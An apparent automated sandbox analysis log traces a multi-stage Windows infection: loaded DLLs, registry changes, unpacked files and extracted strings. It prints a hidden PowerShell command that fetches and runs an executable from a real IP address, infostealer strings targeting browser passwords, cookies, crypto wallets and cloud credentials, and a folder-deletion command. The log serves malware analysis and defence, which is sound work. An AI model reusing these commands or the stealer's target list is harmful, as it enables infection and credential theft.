Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Window found: window name: TWizardForm
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1
Source: Binary string: vdr1.pdb source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: signatureAlgorithmcertsOCSP_SIGNATUREhashAlgorithmissuerNameHashissuerKeyHashOCSP_CERTIDreqCertsingleRequestExtensionsOCSP_ONEREQrequestorNamerequestListrequestExtensionsOCSP_REQINFOtbsRequestoptionalSignatureOCSP_REQUESTresponseTyperesponseOCSP_RESPBYTESresponseStatusresponseBytesOCSP_RESPONSEvalue.byNamevalue.byKeyOCSP_RESPIDrevocationTimerevocationReasonOCSP_REVOKEDINFOvalue.goodvalue.revokedvalue.unknownOCSP_CERTSTATUScertIdcertStatusthisUpdatenextUpdatesingleExtensionsOCSP_SINGLERESPresponderIdproducedAtresponsesresponseExtensionsOCSP_RESPDATAtbsResponseDataOCSP_BASICRESPcrlUrlcrlNumcrlTimeOCSP_CRLIDlocatorOCSP_SERVICELOCcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.4.0 22 Oct 2024built on: Sun Jan 19 01:49:05 2025 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\SYSANAGER:[OPENSSL]"userSDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\lib\users-3"MODULESDIR: "C:\12\decryptor\target\release\build\openssl-sys-da6622e085c0367c\out\openssl-build\install\lib\ossl-modules"CPUINFO: N/AOSSL_WINCTX: Undefinednot availableevp_pkey_asym_cipher_initcrypto\evp\asymcipher.cEVP_PKEY_encryptEVP_PKEY_decryptevp_asym_cipher_from_algorithmcrypto\evp\pmeth_lib.cint_ctx_newEVP_PKEY_CTX_dupEVP_PKEY_CTX_get_signature_mdevp_pkey_ctx_set_mdevp_pkey_ctx_set1_octet_stringsecretpassnpmaxmem_bytesoperationevp_pkey_ctx_ctrl_intEVP_PKEY_CTX_ctrlevp_pkey_ctx_ctrl_str_intdistidhexdistidevp_pkey_ctx_store_cached_dataEVP_PKEY_CTX_md source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: decryptor.pdb source: driver3.exe, 00000020.00000000.2961620464.00007FF7C01A6000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: methodlocationACCESS_DESCRIPTIONAUTHORITY_INFO_ACCESSi2v_AUTHORITY_INFO_ACCESScrypto\x509\v3_info.c%s - %sv2i_AUTHORITY_INFO_ACCESScompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: Excited.pdb source: ugdKEDU.exe, 0000001F.00000000.2957620541.0000000000892000.00000002.00000001.01000000.00000015.sdmp, ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Unpacked PE file: 3.2.TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.b50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 4.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hxbwlokj:EW;fwohzanq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 54.2.crossplatformplayer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 54.2.crossplatformplayer.exe.400000.0.unpack
Source: ugdKEDU[1].exe.10.dr, WS36uhldRk15BMqR9l.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: ugdKEDU.exe.10.dr, WS36uhldRk15BMqR9l.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, WS36uhldRk15BMqR9l.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: ugdKEDU[1].exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: IXR09cJLII
Source: ugdKEDU[1].exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: vK9cjiltfI
Source: ugdKEDU.exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: IXR09cJLII
Source: ugdKEDU.exe.10.dr, QcapXlsQaOUTcM6d72A.cs .Net Code: vK9cjiltfI
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, QcapXlsQaOUTcM6d72A.cs .Net Code: IXR09cJLII
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, QcapXlsQaOUTcM6d72A.cs .Net Code: vK9cjiltfI
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: ugdKEDU[1].exe.10.dr Static PE information: 0xE73D5611 [Mon Dec 8 06:37:05 2092 UTC]
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 11_2_00406328
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: b191a8c87b.exe.10.dr Static PE information: real checksum: 0x1e4f75 should be: 0x1ea13b
Source: random[1].exe1.10.dr Static PE information: real checksum: 0x1c7038 should be: 0x1c56ad
Source: 0269e2f5f3.exe.10.dr Static PE information: real checksum: 0x1c1351 should be: 0x1c437b
Source: 4db43293bc.exe.10.dr Static PE information: real checksum: 0x1d8f5b should be: 0x1dce60
Source: jrgXmS0.exe.10.dr Static PE information: real checksum: 0xe407d should be: 0xe185c
Source: jrgXmS0[1].exe.10.dr Static PE information: real checksum: 0xe407d should be: 0xe185c
Source: tYrnx75[1].exe.10.dr Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: stail.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: random[1].exe2.10.dr Static PE information: real checksum: 0x1d8f5b should be: 0x1dce60
